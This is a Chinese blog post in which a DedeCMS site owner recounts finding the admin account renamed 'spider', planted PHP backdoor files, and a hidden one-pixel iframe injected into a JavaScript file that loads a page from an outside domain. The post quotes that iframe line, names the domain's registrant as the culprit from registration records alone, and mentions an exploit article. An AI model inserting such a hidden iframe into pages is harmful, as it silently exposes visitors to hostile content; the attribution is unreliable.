dede后台提示你的用户名不存在 管理员被改为spider

今天，打开网站后台，输入，帐号密码进行登录。dede提示你的用户名不存在，我就纳闷了，怎么用户名就不存在了，我又没改。我以为输错了，又输入了一遍。结果还是同样的提示你的用户名不存在。好吧，既然不存在那么我就查查是什么原因吧。首先，上传了dede管理员密码重设工具，打算重置密码，但是看到的不是我常用的账户名，而是一个spider的用户名。如果，你看到网站后台的管理员帐户被给为了spider，那么恭喜你，你遇到的问题和我今天遇到的问题是一样一样的。

先登录FTP，查挂马文件。首先在根目录下找到了一个x.php的文件。发现这个页面是个乱码，乱码的话就说明这个文件没有执行，没有执行那么就还有挂马文件。继续找，又找到了 /plus/90sec.php，大概就能判断出来是这个文件捣鬼的。但是我看90sec很熟的样子，就去搜索了一下。居然是腾讯微博好友Joker(@loveyou09)，于是微博求证，得到的答案是否定的，不是他干的。

我很想找到这个拿我站的人，于是我继续找，我发现我的网站没有被挂黑链，按说是不应该的。一个网站被拿之后，不干点什么，总觉得对不起自己的辛苦。我就试试看，看看到底有没有留下点什么。呵呵，皇天不负有心人。终于，让我找到你。

1、在网站头部调用了一个JS文件。<script type=”text/javascript” src=”/Scripts/swfobject.js”></script>

2、这这个JS文件里，有一串调用代码，调用了非本站的页面。<iframe src=http://www.mlwx.cc/web_admin/css/1.htm width=1 height=0></iframe>

3、去查www.mlwx.cc这个网站的备案信息和域名注册信息。域名是2011年6月13日注册的，2012年5月3日备案的。信息全部都是无锡尚美整形美容医院。这里我就不再多说了，根本不用解释。

4、去他们网站商务通留下了我的QQ，让他们技术给我回信息的。我放了句狠话，不加我就恶点竞价。虽然这么说，但是我可没这么干，我知道大家赚钱都不容易，都是为某些企业或客户服务，没有必要大动干戈，以和为贵。人不犯我，我不犯人。人若犯我，呵呵，对不起，虽远必诛！

啰嗦了这么多，下面说下解决办法。用工具先查网站，看看哪个文件有漏洞。

 

检测后发现，/plus/download.php这个文件有严重的漏洞，个人建议直接删除。然后，把整站下载后，重新检查挂马文件，进行逐一剔除，如果有之前很早的备份那就跟好了。如果你也碰到dede后台提示你的用户名不存在，管理员被改为spider的问题，那么就建议你要看看这篇文章了《dedecms最新版本修改任意管理员漏洞+getshell+exp》。